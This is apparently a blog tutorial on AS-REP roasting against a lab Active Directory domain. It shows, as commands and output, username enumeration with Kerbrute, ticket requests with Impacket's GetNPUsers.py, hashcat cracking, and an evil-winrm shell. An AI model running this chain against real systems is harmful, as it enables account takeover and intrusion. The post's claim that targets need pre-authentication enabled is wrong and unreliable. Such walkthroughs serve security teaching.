Quering and Cracking Kerberos Tickets!
One Ticket Please!
Let’s start off with the basics; What is Kerberos?
Kerberos is a authenthication protocol used (typically) within an active directory environment to prove the identity of a device when accessing network based resources, such as SMB, LDAP, or other network protocols. Cool, so that’s how Kerberos works, now how can we break it? Good question, my dear reader! Kerberos is a super abusable protocol. I’ll be showing you one attack vector today that will gain you access to a user account, and all you need to do is know the username (and the user account must have Pre-Authenthication enabled… But that’s out of our control)!
First, you will need Impacket downloaded on your system.
┌─[[email protected]]─[~] └──╼ #git clone https://github.com/SecureAuthCorp/impacket.git Cloning into 'impacket'... remote: Enumerating objects: 16, done. remote: Counting objects: 100% (16/16), done. remote: Compressing objects: 100% (14/14), done. remote: Total 16908 (delta 2), reused 6 (delta 2), pack-reused 16892 Receiving objects: 100% (16908/16908), 5.57 MiB | 8.81 MiB/s, done. Resolving deltas: 100% (12911/12911), done. ┌─[[email protected]]─[~] └──╼ #cd impacket/examples/ ┌─[[email protected]]─[~/impacket/examples] └──╼ #ls atexec.py esentutl.py GetNPUsers.py getTGT.py ifmap.py lookupsid.py mssqlclient.py nmapAnswerMachine.py opdump.py psexec.py registry-read.py sambaPipe.py services.py smbrelayx.py sniff.py wmiexec.py dcomexec.py GetADUsers.py getPac.py GetUserSPNs.py karmaSMB.py mimikatz.py mssqlinstance.py ntfs-read.py ping6.py raiseChild.py reg.py samrdump.py smbclient.py smbserver.py split.py wmipersist.py dpapi.py getArch.py getST.py goldenPac.py kintercept.py mqtt_check.py netview.py ntlmrelayx.py ping.py rdp_check.py rpcdump.py secretsdump.py smbexec.py sniffer.py ticketer.py wmiquery.py ┌─[[email protected]]─[~/impacket/examples] └──╼ #
Afterwards you’ve cloned the Impacket repo, you’re pretty much all set to go. The
impacket/examples folder is where you will mainly be working. In this folder, it contains all the main tools you will need to use for network protocol abuse. Within the other folders in the
impacket directory, there are other tools that are required to make it work. So don’t worry too much about the other folders, as you will be working within the examples folder for the most part!
Next, we’ll use a tool called Kerbrute to brute force the users on the box
┌─[[email protected]]─[~/impacket/examples] └──╼ #wget https://github.com/ropnop/kerbrute/releases/download/v1.0.2/kerbrute_linux_amd64 -O kerbrute <Snip> 2019-11-17 16:17:05 (7.95 MB/s) - ‘kerbrute’ saved [7831686/7831686] ┌─[[email protected]]─[~/impacket/examples] └──╼ #chmod +x kerbrute ┌─[[email protected]]─[~/impacket/examples] └──╼ #./kerbrute __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.2 (fd5f345) - 11/17/19 - Ronnie Flathers @ropnop This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication. It is designed to be used on an internal Windows domain with access to one of the Domain Controllers. Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts Usage: kerbrute [command] Available Commands: bruteforce Bruteforce username:password combos, from a file or stdin bruteuser Bruteforce a single user's password from a wordlist (use - for stdin) help Help about any command passwordspray Test a single password against a list of users (use - for stdin) userenum Enumerate valid domain usernames via Kerberos from a list (use - for stdin) version Display version info and quit Flags: --dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS -d, --domain string The full domain to use (e.g. contoso.com) -h, --help help for kerbrute -o, --output string File to write logs to. Optional. --safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE -t, --threads int Threads to use (default 10) -v, --verbose Log failures and errors Use "kerbrute [command] --help" for more information about a command.
Alrighty, so we’re going to be using the two tools we downloaded, Kerbrute and GetNPUsers.py within impacket to pull a user account, request a Kerberos ticket, and crack the hash to ultimately reveal the user account password and gain a foothold within the Active Directory network!
Brute Forcing Users
┌─[[email protected]]─[~/impacket/examples] └──╼ #./kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d spookysec.local --dc 10.10.13.37 __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.2 (fd5f345) - 11/17/19 - Ronnie Flathers @ropnop 2019/11/17 16:20:11 > Using KDC(s): 2019/11/17 16:20:11 > 10.10.13.37:88 2019/11/17 16:20:11 > [+] VALID USERNAME: [email protected] 2019/11/17 16:20:11 > [+] VALID USERNAME: [email protected] 2019/11/17 16:20:12 > [+] VALID USERNAME: [email protected] 2019/11/17 16:20:13 > [+] VALID USERNAME: [email protected] 2019/11/17 16:20:16 > [+] VALID USERNAME: [email protected] 2019/11/17 16:20:23 > [+] VALID USERNAME: [email protected] 2019/11/17 16:20:27 > [+] VALID USERNAME: [email protected] 2019/11/17 16:20:55 > [+] VALID USERNAME: [email protected] 2019/11/17 16:22:23 > [+] VALID USERNAME: [email protected] 2019/11/17 16:22:35 > [+] VALID USERNAME: [email protected] 2019/11/17 16:23:00 > [+] VALID USERNAME: [email protected] 2019/11/17 16:24:55 > Done! Tested 8295455 usernames (11 valid) in 4 minutes
Reviewing the output, we can see we have a handful of users that we can checkout. There are several users that we should check out immediately, Administrator and svc-demo. That will likely be a unmaintained service account with high privileges that we could use gain a foothold into the network.
Now we can pivot over to impacket, and take a look at GetNPUsers.py, here we will be able to request a Ticket for the svc-demo account and hopefully will be able to crack the password out of the ticket!
Querying a Kerberos Ticket
┌─[[email protected]]─[~/impacket/examples] └──╼ #./GetNPUsers.py spookysec.local/svc-demo -request -no-pass -dc-ip 10.10.13.37 Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Getting TGT for svc-demo [email protected]:f1806292678070 <Snip!> 111f279122d10104b0cfe92c45dcca7eddf45d72eed33437a878b2e68cd844e5c5fd59fb2c72701db5a73ad18bf
Beautiful! Now we can output it to a file and toss it into Hashcat, we will be using the mode 18200 (for this specific Kerberos ticket)
Depending on OS Version, Active Directory configuration, your Kerberos ticket may be different. You may need a different mode. You can view all of them here, under the Hashcat Example Hashes Page
┌─[✗]─[[email protected]]─[~/hashcat] └──╼ #hashcat -a 0 -m 18200 ./ticket /usr/share/wordlists/rockyou.txt hashcat (v5.1.0) starting... OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 1070, 2029/8116 MB allocatable, 15MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 [email protected]:f1806292678070 <Snip!> 111f279122d10104b0cfe92c45dcca7eddf45d72eed33437a878b2e68cd844e5c5fd59fb2c72701db5a73ad18bf:Sup3rS3cr3tP4ssw0rd! Session..........: hashcat Status...........: Cracked Hash.Type........: Kerberos 5 AS-REP etype 23 Hash.Target......: [email protected]:f1806292678070...bffc41 Time.Started.....: Sun Nov 17 16:38:47 2019 (1 sec) Time.Estimated...: Sun Nov 17 16:38:48 2019 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 9757.1 kH/s (6.50ms) @ Accel:512 Loops:1 Thr:64 Vec:1 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 4423680/14344385 (30.84%) Rejected.........: 0/4423680 (0.00%) Restore.Point....: 3932160/14344385 (27.41%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: seaford123 -> raain Hardware.Mon.#1..: Temp: 41c Fan: 0% Util: 10% Core:1949MHz Mem:3802MHz Bus:16 Started: Sun Nov 17 16:38:45 2019 Stopped: Sun Nov 17 16:38:48 2019
Very quickly we cracked the user accounts password. If RDP, WinRM, or SMB is open, we can now authenthicate against each service with the cracked user account password!
Gaining Access with Evil-WinRM
Evil-WinRM is a remote access utility that takes advantage of Windows Remote Management tool, it’s super cool and super handy as it will give you a powershell session directly on the box.
┌─[✗]─[[email protected]]─[~/hashcat] └──╼ #gem install evil-winrm Happy hacking! :) Successfully installed evil-winrm-1.9 Parsing documentation for evil-winrm-1.9 Done installing documentation for evil-winrm after 5 seconds 1 gem installed ┌─[[email protected]]─[~/hashcat] └──╼ #evil-winrm -i 10.10.13.37 -u svc-demo Enter Password: Sup3rS3cr3tP4ssw0rd! Evil-WinRM shell v1.9 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-demo\Documents> whoami spookysec\svc-demo *Evil-WinRM* PS C:\Users\svc-demo\Documents>
And success! We now have a foothold in the domain! There’s a ton of attacks that we might be able to do from here, however, that’s a different post for another day!